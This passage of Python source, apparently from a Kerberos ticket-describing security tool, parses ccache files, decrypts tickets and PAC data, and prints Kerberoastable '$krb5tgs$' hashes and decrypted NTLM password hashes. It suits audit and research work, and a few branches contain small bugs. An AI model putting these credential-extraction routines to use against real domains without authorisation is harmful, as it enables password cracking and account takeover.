2.2.1.13 UF_FLAG Codes\nclass UF_FLAG_Codes(Enum):\n UF_SCRIPT = 0x00000001\n UF_ACCOUNTDISABLE = 0x00000002\n UF_HOMEDIR_REQUIRED = 0x00000008\n UF_LOCKOUT = 0x00000010\n UF_PASSWD_NOTREQD = 0x00000020\n UF_PASSWD_CANT_CHANGE = 0x00000040\n UF_ENCRYPTED_TEXT_PASSWORD_ALLOWED = 0x00000080\n UF_TEMP_DUPLICATE_ACCOUNT = 0x00000100\n UF_NORMAL_ACCOUNT = 0x00000200\n UF_INTERDOMAIN_TRUST_ACCOUNT = 0x00000800\n UF_WORKSTATION_TRUST_ACCOUNT = 0x00001000\n UF_SERVER_TRUST_ACCOUNT = 0x00002000\n UF_DONT_EXPIRE_PASSWD = 0x00010000\n UF_MNS_LOGON_ACCOUNT = 0x00020000\n UF_SMARTCARD_REQUIRED = 0x00040000\n UF_TRUSTED_FOR_DELEGATION = 0x00080000\n UF_NOT_DELEGATED = 0x00100000\n UF_USE_DES_KEY_ONLY = 0x00200000\n UF_DONT_REQUIRE_PREAUTH = 0x00400000\n UF_PASSWORD_EXPIRED = 0x00800000\n UF_TRUSTED_TO_AUTHENTICATE_FOR_DELEGATION = 0x01000000\n UF_NO_AUTH_DATA_REQUIRED = 0x02000000\n UF_PARTIAL_SECRETS_ACCOUNT = 0x04000000\n UF_USE_AES_KEYS = 0x08000000\n\n# PAC_ATTRIBUTES_INFO Flags code\nclass Upn_Dns_Flags(Enum):\n U_UsernameOnly = 0x00000001\n S_SidSamSupplied = 0x00000002\n\n# PAC_ATTRIBUTES_INFO Flags code\nclass Attributes_Flags(Enum):\n PAC_WAS_REQUESTED = 0x00000001\n PAC_WAS_GIVEN_IMPLICITLY = 0x00000002\n\n\n# Builtin known Windows Group\nMsBuiltInGroups = {\n \"498\": \"Enterprise Read-Only Domain Controllers\",\n \"512\": \"Domain Admins\",\n \"513\": \"Domain Users\",\n \"514\": \"Domain Guests\",\n \"515\": \"Domain Computers\",\n \"516\": \"Domain Controllers\",\n \"517\": \"Cert Publishers\",\n \"518\": \"Schema Admins\",\n \"519\": \"Enterprise Admins\",\n \"520\": \"Group Policy Creator Owners\",\n \"521\": \"Read-Only Domain Controllers\",\n \"522\": \"Cloneable Controllers\",\n \"525\": \"Protected Users\",\n \"526\": \"Key Admins\",\n \"527\": \"Enterprise Key Admins\",\n \"553\": \"RAS and IAS Servers\",\n \"571\": \"Allowed RODC Password Replication Group\",\n \"572\": \"Denied RODC Password Replication Group\",\n \"S-1-1-0\": \"Everyone\",\n \"S-1-2-0\": \"Local\",\n \"S-1-2-1\": \"Console Logon\",\n \"S-1-3-0\": \"Creator Owner\",\n \"S-1-3-1\": \"Creator Group\",\n \"S-1-3-2\": \"Owner Server\",\n \"S-1-3-3\": \"Group Server\",\n \"S-1-3-4\": \"Owner Rights\",\n \"S-1-5-1\": \"Dialup\",\n \"S-1-5-2\": \"Network\",\n \"S-1-5-3\": \"Batch\",\n \"S-1-5-4\": \"Interactive\",\n \"S-1-5-6\": \"Service\",\n \"S-1-5-7\": \"Anonymous Logon\",\n \"S-1-5-8\": \"Proxy\",\n \"S-1-5-9\": \"Enterprise Domain Controllers\",\n \"S-1-5-10\": \"Self\",\n \"S-1-5-11\": \"Authenticated Users\",\n \"S-1-5-12\": \"Restricted Code\",\n \"S-1-5-13\": \"Terminal Server User\",\n \"S-1-5-14\": \"Remote Interactive Logon\",\n \"S-1-5-15\": \"This Organization\",\n \"S-1-5-17\": \"IUSR\",\n \"S-1-5-18\": \"System (or LocalSystem)\",\n \"S-1-5-19\": \"NT Authority (LocalService)\",\n \"S-1-5-20\": \"Network Service\",\n \"S-1-5-32-544\": \"Administrators\",\n \"S-1-5-32-545\": \"Users\",\n \"S-1-5-32-546\": \"Guests\",\n \"S-1-5-32-547\": \"Power Users\",\n \"S-1-5-32-548\": \"Account Operators\",\n \"S-1-5-32-549\": \"Server Operators\",\n \"S-1-5-32-550\": \"Print Operators\",\n \"S-1-5-32-551\": \"Backup Operators\",\n \"S-1-5-32-552\": \"Replicators\",\n \"S-1-5-32-554\": \"Builtin\\\\Pre-Windows\",\n \"S-1-5-32-555\": \"Builtin\\\\Remote Desktop Users\",\n \"S-1-5-32-556\": \"Builtin\\\\Network Configuration Operators\",\n \"S-1-5-32-557\": \"Builtin\\\\Incoming Forest Trust Builders\",\n \"S-1-5-32-558\": \"Builtin\\\\Performance Monitor Users\",\n \"S-1-5-32-559\": \"Builtin\\\\Performance Log Users\",\n \"S-1-5-32-560\": \"Builtin\\\\Windows Authorization Access Group\",\n \"S-1-5-32-561\": \"Builtin\\\\Terminal Server License Servers\",\n \"S-1-5-32-562\": \"Builtin\\\\Distributed COM Users\",\n \"S-1-5-32-568\": \"Builtin\\\\IIS_IUSRS\",\n \"S-1-5-32-569\": \"Builtin\\\\Cryptographic Operators\",\n \"S-1-5-32-573\": \"Builtin\\\\Event Log Readers\",\n \"S-1-5-32-574\": \"Builtin\\\\Certificate Service DCOM Access\",\n \"S-1-5-32-575\": \"Builtin\\\\RDS Remote Access Servers\",\n \"S-1-5-32-576\": \"Builtin\\\\RDS Endpoint Servers\",\n \"S-1-5-32-577\": \"Builtin\\\\RDS Management Servers\",\n \"S-1-5-32-578\": \"Builtin\\\\Hyper-V Administrators\",\n \"S-1-5-32-579\": \"Builtin\\\\Access Control Assistance Operators\",\n \"S-1-5-32-580\": \"Builtin\\\\Remote Management Users\",\n \"S-1-5-64-10\": \"NTLM Authentication\",\n \"S-1-5-64-14\": \"SChannel Authentication\",\n \"S-1-5-64-21\": \"Digest Authentication\",\n \"S-1-5-80\": \"NT Service\",\n \"S-1-5-80-0\": \"All Services\",\n \"S-1-5-83-0\": \"NT VIRTUAL MACHINE\\\\Virtual Machines\",\n \"S-1-5-113\": \"Local Account\",\n \"S-1-5-114\": \"Local Account and member of Administrators group\",\n \"S-1-5-1000\": \"Other Organization\",\n \"S-1-15-2-1\": \"All app packages\",\n \"S-1-16-0\": \"ML Untrusted\",\n \"S-1-16-4096\": \"ML Low\",\n \"S-1-16-8192\": \"ML Medium\",\n \"S-1-16-8448\": \"ML Medium Plus\",\n \"S-1-16-12288\": \"ML High\",\n \"S-1-16-16384\": \"ML System\",\n \"S-1-16-20480\": \"ML Protected Process\",\n \"S-1-16-28672\": \"ML Secure Process\",\n \"S-1-18-1\": \"Authentication authority asserted identity\",\n \"S-1-18-2\": \"Service asserted identity\",\n \"S-1-18-3\": \"Fresh public key identity\",\n \"S-1-18-4\": \"Key trust identity\",\n \"S-1-18-5\": \"Key property MFA\",\n \"S-1-18-6\": \"Key property attestation\",\n}\n\n\ndef parse_ccache(args):\n ccache = CCache.loadFile(args.ticket)\n\n cred_number = 0\n logging.info('Number of credentials in cache: %d' % len(ccache.credentials))\n\n for creds in ccache.credentials:\n logging.info('Parsing credential[%d]:' % cred_number)\n\n rawTicket = creds.toTGS()\n decodedTicket = decoder.decode(rawTicket['KDC_REP'], asn1Spec=TGS_REP())[0]\n\n # Printing the session key\n sessionKey = hexlify(rawTicket['sessionKey'].contents).decode('utf-8')\n logging.info(\"%-30s: %s\" % (\"Ticket Session Key\", sessionKey))\n\n # Beginning the parsing of the ticket\n logging.info(\"%-30s: %s\" % (\"User Name\", creds['client'].prettyPrint().split(b'@')[0].decode('utf-8')))\n logging.info(\"%-30s: %s\" % (\"User Realm\", creds['client'].prettyPrint().split(b'@')[1].decode('utf-8')))\n spn = creds['server'].prettyPrint().split(b'@')[0].decode('utf-8')\n logging.info(\"%-30s: %s\" % (\"Service Name\", spn))\n logging.info(\"%-30s: %s\" % (\"Service Realm\", creds['server'].prettyPrint().split(b'@')[1].decode('utf-8')))\n logging.info(\"%-30s: %s\" % (\"Start Time\", datetime.datetime.fromtimestamp(creds['time']['starttime']).strftime(\"%d/%m/%Y %H:%M:%S %p\")))\n if datetime.datetime.fromtimestamp(creds['time']['endtime']) < datetime.datetime.now():\n logging.info(\"%-30s: %s (expired)\" % (\"End Time\", datetime.datetime.fromtimestamp(creds['time']['endtime']).strftime(\"%d/%m/%Y %H:%M:%S %p\")))\n else:\n logging.info(\"%-30s: %s\" % (\"End Time\", datetime.datetime.fromtimestamp(creds['time']['endtime']).strftime(\"%d/%m/%Y %H:%M:%S %p\")))\n if datetime.datetime.fromtimestamp(creds['time']['renew_till']) < datetime.datetime.now():\n logging.info(\"%-30s: %s (expired)\" % (\"RenewTill\", datetime.datetime.fromtimestamp(creds['time']['renew_till']).strftime(\"%d/%m/%Y %H:%M:%S %p\")))\n else:\n logging.info(\"%-30s: %s\" % (\"RenewTill\", datetime.datetime.fromtimestamp(creds['time']['renew_till']).strftime(\"%d/%m/%Y %H:%M:%S %p\")))\n\n flags = []\n for k in constants.TicketFlags:\n if ((creds['tktflags'] >> (31 - k.value)) & 1) == 1:\n flags.append(constants.TicketFlags(k.value).name)\n logging.info(\"%-30s: (0x%x) %s\" % (\"Flags\", creds['tktflags'], \", \".join(flags)))\n keyType = constants.EncryptionTypes(creds[\"key\"][\"keytype\"]).name\n logging.info(\"%-30s: %s\" % (\"KeyType\", keyType))\n logging.info(\"%-30s: %s\" % (\"Base64(key)\", base64.b64encode(creds[\"key\"][\"keyvalue\"]).decode(\"utf-8\")))\n\n if spn.split('/')[0] != 'krbtgt':\n logging.debug(\"Attempting to create Kerberoast hash\")\n kerberoast_hash = None\n # code adapted from Rubeus's DisplayTicket() (https://github.com/GhostPack/Rubeus/blob/3620814cd2c5f05e87cddd50211197bd932fec51/Rubeus/lib/LSA.cs)\n # if this isn't a TGT, try to display a Kerberoastable hash\n if keyType != \"rc4_hmac\" and keyType != \"aes256_cts_hmac_sha1_96\":\n # can only display rc4_hmac ad it doesn't have a salt. DES/AES keys require the user/domain as a salt, and we don't have\n # the user account name that backs the requested SPN for the ticket, no no dice :(\n logging.debug(\"Service ticket uses encryption key type %s, unable to extract hash and salt\" % keyType)\n elif keyType == \"rc4_hmac\":\n kerberoast_hash = kerberoast_from_ccache(decodedTGS = decodedTicket, spn = spn, username = args.user, domain = args.domain)\n elif args.user:\n if args.user.endswith(\"$\"):\n user = \"host%s.%s\" % (args.user.rstrip('$').lower(), args.domain.lower())\n else:\n user = args.user\n kerberoast_hash = kerberoast_from_ccache(decodedTGS = decodedTicket, spn = spn, username = user, domain = args.domain)\n else:\n logging.error(\"AES256 in use but no '-u/--user' passed, unable to generate crackable hash\")\n if kerberoast_hash:\n logging.info(\"%-30s: %s\" % (\"Kerberoast hash\", kerberoast_hash))\n\n logging.info(\"%-30s:\" % \"Decoding unencrypted data in credential[%d]['ticket']\" % cred_number)\n spn = \"/\".join(list([str(sname_component) for sname_component in decodedTicket['ticket']['sname']['name-string']]))\n etype = decodedTicket['ticket']['enc-part']['etype']\n logging.info(\" %-28s: %s\" % (\"Service Name\", spn))\n logging.info(\" %-28s: %s\" % (\"Service Realm\", decodedTicket['ticket']['realm']))\n logging.info(\" %-28s: %s (etype %d)\" % (\"Encryption type\", constants.EncryptionTypes(etype).name, etype))\n if not decodedTicket['ticket']['enc-part']['kvno'].isNoValue():\n logging.debug(\"No kvno in ticket, skipping\")\n logging.info(\" %-28s: %d\" % (\"Key version number (kvno)\", decodedTicket['ticket']['enc-part']['kvno']))\n logging.debug(\"Handling Kerberos keys\")\n ekeys = generate_kerberos_keys(args.rc4, args.aes, args.password, args.hex_pass, args.salt, args.user, args.domain)\n\n # copypasta from krbrelayx.py\n # Select the correct encryption key\n try:\n logging.debug('Ticket is encrypted with %s (etype %d)' % (constants.EncryptionTypes(etype).name, etype))\n key = ekeys[etype]\n logging.debug('Using corresponding key: %s' % hexlify(key.contents).decode('utf-8'))\n # This raises a KeyError (pun intended) if our key is not found\n except KeyError:\n if len(ekeys) > 0:\n logging.error('Could not find the correct encryption key! Ticket is encrypted with %s (etype %d), but only keytype(s) %s were calculated/supplied',\n constants.EncryptionTypes(etype).name,\n etype,\n ', '.join([str(enctype) for enctype in ekeys.keys()]))\n else:\n logging.error('Could not find the correct encryption key! Ticket is encrypted with %s (etype %d), but no keys/creds were supplied',\n constants.EncryptionTypes(etype).name,\n etype)\n return None\n\n # todo : decodedTicket['ticket']['enc-part'] is handled. Handle decodedTicket['enc-part']?\n # Recover plaintext info from ticket\n try:\n cipherText = decodedTicket['ticket']['enc-part']['cipher']\n newCipher = _enctype_table[int(etype)]\n plainText = newCipher.decrypt(key, 2, cipherText)\n except InvalidChecksum:\n logging.error('Ciphertext integrity failed. Most likely the account password or AES key is incorrect')\n if args.salt:\n logging.info('Make sure the salt/username/domain are set and with the proper values. In case of a computer account, append a \"$\" to the name.')\n logging.debug('Remember: the encrypted-part of the ticket is secured with one of the target service\\'s Kerberos keys. The target service is the one who owns the \\'Service Name\\' SPN printed above')\n return\n\n logging.debug('Ticket successfully decrypted')\n encTicketPart = decoder.decode(plainText, asn1Spec=EncTicketPart())[0]\n sessionKey = Key(encTicketPart['key']['keytype'], bytes(encTicketPart['key']['keyvalue']))\n adIfRelevant = decoder.decode(encTicketPart['authorization-data'][0]['ad-data'], asn1Spec=AD_IF_RELEVANT())[0]\n # So here we have the PAC\n pacType = pac.PACTYPE(adIfRelevant[0]['ad-data'].asOctets())\n # parsing every PAC\n parsed_pac = parse_pac(pacType, args)\n logging.info(\"%-30s:\" % \"Decoding credential[%d]['ticket']['enc-part']\" % cred_number)\n # One section per PAC\n for element_type in parsed_pac:\n element_type_name = list(element_type.keys())[0]\n logging.info(\" %-28s\" % element_type_name)\n # iterate over each attribute of the current PAC\n for attribute in element_type[element_type_name]:\n value = element_type[element_type_name][attribute]\n if isinstance(value, Sequence) and not isinstance(value, str):\n # If the value is an array, print as a multiline view for better readability\n if len(value) > 0:\n logging.info(\" %-26s: %s\" % (attribute, value[0]))\n for subvalue in value[1:]:\n logging.info(\" \"*32+\"%s\" % subvalue)\n else:\n logging.info(\" %-26s:\" % attribute)\n else:\n logging.info(\" %-26s: %s\" % (attribute, value))\n\n cred_number += 1\n\n\ndef parse_pac(pacType, args):\n def PACparseFILETIME(data):\n # FILETIME structure (minwinbase.h)\n # Contains a 64-bit value representing the number of 100-nanosecond intervals since January 1, 1601 (UTC).\n # https://docs.microsoft.com/en-us/windows/win32/api/minwinbase/ns-minwinbase-filetime\n dwLowDateTime = data['dwLowDateTime']\n dwHighDateTime = data['dwHighDateTime']\n v_FILETIME = \"Infinity (absolute time)\"\n if dwLowDateTime != 0xffffffff and dwHighDateTime != 0x7fffffff:\n temp_time = dwHighDateTime\n temp_time <<= 32\n temp_time |= dwLowDateTime\n if datetime.timedelta(microseconds=temp_time / 10).total_seconds() != 0:\n v_FILETIME = (datetime.datetime(1601, 1, 1, 0, 0, 0) + datetime.timedelta(microseconds=temp_time / 10)).strftime(\"%d/%m/%Y %H:%M:%S %p\")\n return v_FILETIME\n\n\n def PACparseGroupIds(data):\n groups = []\n for group in data:\n groupMembership = {}\n groupMembership['RelativeId'] = group['RelativeId']\n groupMembership['Attributes'] = group['Attributes']\n groups.append(groupMembership)\n return groups\n\n\n parsed_tuPAC = []\n buff = pacType['Buffers']\n\n for bufferN in range(pacType['cBuffers']):\n infoBuffer = pac.PAC_INFO_BUFFER(buff)\n data = pacType['Buffers'][infoBuffer['Offset']-8:][:infoBuffer['cbBufferSize']]\n if infoBuffer['ulType'] == pac.PAC_LOGON_INFO:\n type1 = TypeSerialization1(data)\n newdata = data[len(type1)+4:]\n kerbdata = pac.KERB_VALIDATION_INFO()\n kerbdata.fromString(newdata)\n kerbdata.fromStringReferents(newdata[len(kerbdata.getData()):])\n parsed_data = {}\n parsed_data['Logon Time'] = PACparseFILETIME(kerbdata['LogonTime'])\n parsed_data['Logoff Time'] = PACparseFILETIME(kerbdata['LogoffTime'])\n parsed_data['Kickoff Time'] = PACparseFILETIME(kerbdata['KickOffTime'])\n parsed_data['Password Last Set'] = PACparseFILETIME(kerbdata['PasswordLastSet'])\n parsed_data['Password Can Change'] = PACparseFILETIME(kerbdata['PasswordCanChange'])\n parsed_data['Password Must Change'] = PACparseFILETIME(kerbdata['PasswordMustChange'])\n parsed_data['LastSuccessfulILogon'] = PACparseFILETIME(kerbdata['LastSuccessfulILogon'])\n parsed_data['LastFailedILogon'] = PACparseFILETIME(kerbdata['LastFailedILogon'])\n parsed_data['FailedILogonCount'] = kerbdata['FailedILogonCount']\n parsed_data['Account Name'] = kerbdata['EffectiveName']\n parsed_data['Full Name'] = kerbdata['FullName']\n parsed_data['Logon Script'] = kerbdata['LogonScript']\n parsed_data['Profile Path'] = kerbdata['ProfilePath']\n parsed_data['Home Dir'] = kerbdata['HomeDirectory']\n parsed_data['Dir Drive'] = kerbdata['HomeDirectoryDrive']\n parsed_data['Logon Count'] = kerbdata['LogonCount']\n parsed_data['Bad Password Count'] = kerbdata['BadPasswordCount']\n parsed_data['User RID'] = kerbdata['UserId']\n parsed_data['Group RID'] = kerbdata['PrimaryGroupId']\n parsed_data['Group Count'] = kerbdata['GroupCount']\n\n all_groups_id = [str(gid['RelativeId']) for gid in PACparseGroupIds(kerbdata['GroupIds'])]\n parsed_data['Groups'] = \", \".join(all_groups_id)\n groups = []\n unknown_count = 0\n # Searching for common group name\n for gid in all_groups_id:\n group_name = MsBuiltInGroups.get(gid)\n if group_name:\n groups.append(f\"({gid}) {group_name}\")\n else:\n unknown_count += 1\n if unknown_count > 0:\n groups.append(f\"+{unknown_count} Unknown custom group{'s' if unknown_count > 1 else ''}\")\n parsed_data['Groups (decoded)'] = groups\n\n # UserFlags parsing\n UserFlags = kerbdata['UserFlags']\n User_Flags_Flags = []\n for flag in User_Flags:\n if UserFlags & flag.value:\n User_Flags_Flags.append(flag.name)\n parsed_data['User Flags'] = \"(%s) %s\" % (UserFlags, \", \".join(User_Flags_Flags))\n parsed_data['User Session Key'] = hexlify(kerbdata['UserSessionKey']).decode('utf-8')\n parsed_data['Logon Server'] = kerbdata['LogonServer']\n parsed_data['Logon Domain Name'] = kerbdata['LogonDomainName']\n\n # LogonDomainId parsing\n if kerbdata['LogonDomainId'] == b'':\n parsed_data['Logon Domain SID'] = kerbdata['LogonDomainId']\n else:\n parsed_data['Logon Domain SID'] = kerbdata['LogonDomainId'].formatCanonical()\n\n # UserAccountControl parsing\n UAC = kerbdata['UserAccountControl']\n UAC_Flags = []\n for flag in USER_ACCOUNT_Codes:\n if UAC & flag.value:\n UAC_Flags.append(flag.name)\n parsed_data['User Account Control'] = \"(%s) %s\" % (UAC, \", \".join(UAC_Flags))\n parsed_data['Extra SID Count'] = kerbdata['SidCount']\n extraSids = []\n\n # ExtraSids parsing\n for extraSid in kerbdata['ExtraSids']:\n sid = extraSid['Sid'].formatCanonical()\n attributes = extraSid['Attributes']\n attributes_flags = []\n for flag in SE_GROUP_Attributes:\n if attributes & flag.value:\n attributes_flags.append(flag.name)\n # Group name matching\n group_name = MsBuiltInGroups.get(sid, '')\n if not group_name and len(sid.split('-')) == 8:\n # Try to find an RID match\n group_name = MsBuiltInGroups.get(sid.split('-')[-1], '')\n if group_name:\n group_name = f\" {group_name}\"\n extraSids.append(\"%s%s (%s)\" % (sid, group_name, ', '.join(attributes_flags)))\n parsed_data['Extra SIDs'] = extraSids\n\n # ResourceGroupDomainSid parsing\n if kerbdata['ResourceGroupDomainSid'] == b'':\n parsed_data['Resource Group Domain SID'] = kerbdata['ResourceGroupDomainSid']\n else:\n parsed_data['Resource Group Domain SID'] = kerbdata['ResourceGroupDomainSid'].formatCanonical()\n\n parsed_data['Resource Group Count'] = kerbdata['ResourceGroupCount']\n parsed_data['Resource Group Ids'] = ', '.join([str(gid['RelativeId']) for gid in PACparseGroupIds(kerbdata['ResourceGroupIds'])])\n parsed_data['LMKey'] = hexlify(kerbdata['LMKey']).decode('utf-8')\n parsed_data['SubAuthStatus'] = kerbdata['SubAuthStatus']\n parsed_data['Reserved3'] = kerbdata['Reserved3']\n parsed_tuPAC.append({\"LoginInfo\": parsed_data})\n\n elif infoBuffer['ulType'] == pac.PAC_CLIENT_INFO_TYPE:\n clientInfo = pac.PAC_CLIENT_INFO()\n clientInfo.fromString(data)\n parsed_data = {}\n try:\n parsed_data['Client Id'] = PACparseFILETIME(clientInfo['ClientId'])\n except:\n try:\n parsed_data['Client Id'] = PACparseFILETIME(FILETIME(data[:32]))\n except Exception as e:\n logging.error(e)\n parsed_data['Client Name'] = clientInfo['Name'].decode('utf-16-le')\n parsed_tuPAC.append({\"ClientName\": parsed_data})\n\n elif infoBuffer['ulType'] == pac.PAC_UPN_DNS_INFO:\n upn = pac.UPN_DNS_INFO(data)\n # UPN PArsing\n UpnLength = upn['UpnLength']\n UpnOffset = upn['UpnOffset']\n UpnName = data[UpnOffset:UpnOffset+UpnLength].decode('utf-16-le')\n\n # DNS Name Parsing\n DnsDomainNameLength = upn['DnsDomainNameLength']\n DnsDomainNameOffset = upn['DnsDomainNameOffset']\n DnsName = data[DnsDomainNameOffset:DnsDomainNameOffset + DnsDomainNameLength].decode('utf-16-le')\n\n # Flag parsing\n flags = upn['Flags']\n attr_flags = []\n for flag_lib in Upn_Dns_Flags:\n if flags & flag_lib.value:\n attr_flags.append(flag_lib.name)\n parsed_data = {}\n parsed_data['Flags'] = f\"({flags}) {', '.join(attr_flags)}\"\n parsed_data['UPN'] = UpnName\n parsed_data['DNS Domain Name'] = DnsName\n\n # Depending on the flag supplied, additional data may be supplied\n if Upn_Dns_Flags.S_SidSamSupplied.name in attr_flags:\n # SamAccountName and Sid is also supplied\n upn = pac.UPN_DNS_INFO_FULL(data)\n # Sam parsing\n SamNameLength = upn['SamNameLength']\n SamNameOffset = upn['SamNameOffset']\n SamName = data[SamNameOffset:SamNameOffset+SamNameLength].decode('utf-16-le')\n\n # Sid parsing\n SidLength = upn['SidLength']\n SidOffset = upn['SidOffset']\n Sid = LDAP_SID(data[SidOffset:SidOffset+SidLength]) # Using LDAP_SID instead of RPC_SID (https://github.com/SecureAuthCorp/impacket/issues/1386)\n\n parsed_data[\"SamAccountName\"] = SamName\n parsed_data[\"UserSid\"] = Sid.formatCanonical()\n parsed_tuPAC.append({\"UpnDns\": parsed_data})\n\n elif infoBuffer['ulType'] == pac.PAC_SERVER_CHECKSUM:\n signatureData = pac.PAC_SIGNATURE_DATA(data)\n parsed_data = {}\n parsed_data['Signature Type'] = ChecksumTypes(signatureData['SignatureType']).name\n parsed_data['Signature'] = hexlify(signatureData['Signature']).decode('utf-8')\n parsed_tuPAC.append({\"ServerChecksum\": parsed_data})\n\n elif infoBuffer['ulType'] == pac.PAC_PRIVSVR_CHECKSUM:\n signatureData = pac.PAC_SIGNATURE_DATA(data)\n parsed_data = {}\n parsed_data['Signature Type'] = ChecksumTypes(signatureData['SignatureType']).name\n # signatureData.dump()\n parsed_data['Signature'] = hexlify(signatureData['Signature']).decode('utf-8')\n parsed_tuPAC.append({\"KDCChecksum\": parsed_data})\n\n elif infoBuffer['ulType'] == pac.PAC_CREDENTIALS_INFO:\n # Parsing 2.6.1 PAC_CREDENTIAL_INFO\n credential_info = pac.PAC_CREDENTIAL_INFO(data)\n parsed_credential_info = {}\n parsed_credential_info['Version'] = \"(0x%x) %d\" % (credential_info.fields['Version'], credential_info.fields['Version'])\n credinfo_enctype = credential_info.fields['EncryptionType']\n parsed_credential_info['Encryption Type'] = \"(0x%x) %s\" % (credinfo_enctype, constants.EncryptionTypes(credential_info.fields['EncryptionType']).name)\n if not args.asrep_key:\n parsed_credential_info['Encryption Type'] = \"\"\n logging.error('No ASREP key supplied, cannot decrypt PAC Credentials')\n parsed_tuPAC.append({\"Credential Info\": parsed_credential_info})\n else:\n parsed_tuPAC.append({\"Credential Info\": parsed_credential_info})\n newCipher = _enctype_table[credinfo_enctype]\n key = Key(credinfo_enctype, unhexlify(args.asrep_key))\n plain_credential_data = newCipher.decrypt(key, 16, credential_info.fields['SerializedData'])\n type1 = TypeSerialization1(plain_credential_data)\n newdata = plain_credential_data[len(type1) + 4:]\n # Parsing 2.6.2 PAC_CREDENTIAL_DATA\n credential_data = pac.PAC_CREDENTIAL_DATA(newdata)\n parsed_credential_data = {}\n parsed_credential_data[' Credential Count'] = credential_data['CredentialCount']\n parsed_tuPAC.append({\" Credential Data\": parsed_credential_data})\n # Parsing (one or many) 2.6.3 SECPKG_SUPPLEMENTAL_CRED\n for credential in credential_data['Credentials']:\n parsed_secpkg_supplemental_cred = {}\n parsed_secpkg_supplemental_cred[' Package Name'] = credential['PackageName']\n parsed_secpkg_supplemental_cred[' Credential Size'] = credential['CredentialSize']\n parsed_tuPAC.append({\" SecPkg Credentials\": parsed_secpkg_supplemental_cred})\n # Parsing 2.6.4 NTLM_SUPPLEMENTAL_CREDENTIAL\n ntlm_supplemental_cred = pac.NTLM_SUPPLEMENTAL_CREDENTIAL(b''.join(credential['Credentials']))\n parsed_ntlm_supplemental_cred = {}\n parsed_ntlm_supplemental_cred[' Version'] = ntlm_supplemental_cred['Version']\n parsed_ntlm_supplemental_cred[' Flags'] = ntlm_supplemental_cred['Flags']\n parsed_ntlm_supplemental_cred[' LmPasword'] = hexlify(ntlm_supplemental_cred['LmPassword']).decode('utf-8')\n parsed_ntlm_supplemental_cred[' NtPasword'] = hexlify(ntlm_supplemental_cred['NtPassword']).decode('utf-8')\n parsed_tuPAC.append({\" NTLM Credentials\": parsed_ntlm_supplemental_cred})\n\n elif infoBuffer['ulType'] == pac.PAC_DELEGATION_INFO:\n delegationInfo = pac.S4U_DELEGATION_INFO(data)\n parsed_data = {}\n parsed_data['S4U2proxyTarget'] = delegationInfo['S4U2proxyTarget']\n parsed_data['TransitedListSize'] = delegationInfo.fields['TransitedListSize'].fields['Data']\n parsed_data['S4UTransitedServices'] = delegationInfo['S4UTransitedServices'].decode('utf-8')\n parsed_tuPAC.append({\"DelegationInfo\": parsed_data})\n elif infoBuffer['ulType'] == pac.PAC_ATTRIBUTES_INFO:\n # Parsing 2.14 PAC_ATTRIBUTES_INFO\n attributeInfo = pac.PAC_ATTRIBUTE_INFO(data)\n flags = attributeInfo['Flags']\n attr_flags = []\n for flag_lib in Attributes_Flags:\n if flags & flag_lib.value:\n attr_flags.append(flag_lib.name)\n\n parsed_data = {\n 'Flags': f\"({flags}) {', '.join(attr_flags)}\"\n }\n parsed_tuPAC.append({\"Attributes Info\": parsed_data})\n elif infoBuffer['ulType'] == pac.PAC_REQUESTOR_INFO:\n # Parsing 2.15 PAC_REQUESTOR\n requestorInfo = pac.PAC_REQUESTOR(data)\n parsed_data = {\n 'UserSid': requestorInfo['UserSid'].formatCanonical()\n }\n parsed_tuPAC.append({\"Requestor Info\": parsed_data})\n else:\n logging.debug(\"Unsupported PAC structure: %s. Please raise an issue or PR\" % infoBuffer['ulType'])\n\n buff = buff[len(infoBuffer):]\n return parsed_tuPAC\n\n\n\ndef kerberoast_from_ccache(decodedTGS, spn, username, domain):\n try:\n if not domain:\n domain = decodedTGS['ticket']['realm']._value.upper()\n else:\n domain = domain.upper()\n\n if not username:\n username = \"USER\"\n\n username = username.rstrip('$')\n\n # Copy-pasta from GestUserSPNs.py\n if decodedTGS['ticket']['enc-part']['etype'] == constants.EncryptionTypes.rc4_hmac.value:\n entry = '$krb5tgs$%d$*%s$%s$%s*$%s$%s' % (\n constants.EncryptionTypes.rc4_hmac.value, username, domain, spn.replace(':', '~'),\n hexlify(decodedTGS['ticket']['enc-part']['cipher'][:16].asOctets()).decode(),\n hexlify(decodedTGS['ticket']['enc-part']['cipher'][16:].asOctets()).decode())\n elif decodedTGS['ticket']['enc-part']['etype'] == constants.EncryptionTypes.aes128_cts_hmac_sha1_96.value:\n entry = '$krb5tgs$%d$%s$%s$*%s*$%s$%s' % (\n constants.EncryptionTypes.aes128_cts_hmac_sha1_96.value, username, domain, spn.replace(':', '~'),\n hexlify(decodedTGS['ticket']['enc-part']['cipher'][-12:].asOctets()).decode(),\n hexlify(decodedTGS['ticket']['enc-part']['cipher'][:-12:].asOctets()).decode)\n elif decodedTGS['ticket']['enc-part']['etype'] == constants.EncryptionTypes.aes256_cts_hmac_sha1_96.value:\n entry = '$krb5tgs$%d$%s$%s$*%s*$%s$%s' % (\n constants.EncryptionTypes.aes256_cts_hmac_sha1_96.value, username, domain, spn.replace(':', '~'),\n hexlify(decodedTGS['ticket']['enc-part']['cipher'][-12:].asOctets()).decode(),\n hexlify(decodedTGS['ticket']['enc-part']['cipher'][:-12:].asOctets()).decode())\n elif decodedTGS['ticket']['enc-part']['etype'] == constants.EncryptionTypes.des_cbc_md5.value:\n entry = '$krb5tgs$%d$*%s$%s$%s*$%s$%s' % (\n constants.EncryptionTypes.des_cbc_md5.value, username, domain, spn.replace(':', '~'),\n hexlify(decodedTGS['ticket']['enc-part']['cipher'][:16].asOctets()).decode(),\n hexlify(decodedTGS['ticket']['enc-part']['cipher'][16:].asOctets()).decode())\n else:\n logging.debug('Skipping %s/%s due to incompatible e-type %d' % (\n decodedTGS['ticket']['sname']['name-string'][0], decodedTGS['ticket']['sname']['name-string'][1],\n decodedTGS['ticket']['enc-part']['etype']))\n return entry\n except Exception as e:\n raise\n logging.debug(\"Not able to parse ticket: %s\" % e)\n\n\ndef parse_args():\n parser = argparse.ArgumentParser(add_help=True, description='Ticket describer. Parses ticket, decrypts the enc-part, and parses the PAC.')\n\n parser.add_argument('ticket', action='store', help='Path to ticket.ccache')\n parser.add_argument('-debug', action='store_true', help='Turn DEBUG output ON')\n parser.add_argument('-ts', action='store_true', help='Adds timestamp to every logging output')\n\n ticket_decryption = parser.add_argument_group()\n ticket_decryption.title = 'Ticket decryption credentials (optional)'\n ticket_decryption.description = 'Tickets carry a set of information encrypted by one of the target service account\\'s Kerberos keys.' \\\n '(example: if the ticket is for user:\"john\" for service:\"cifs/service.domain.local\", you need to supply credentials 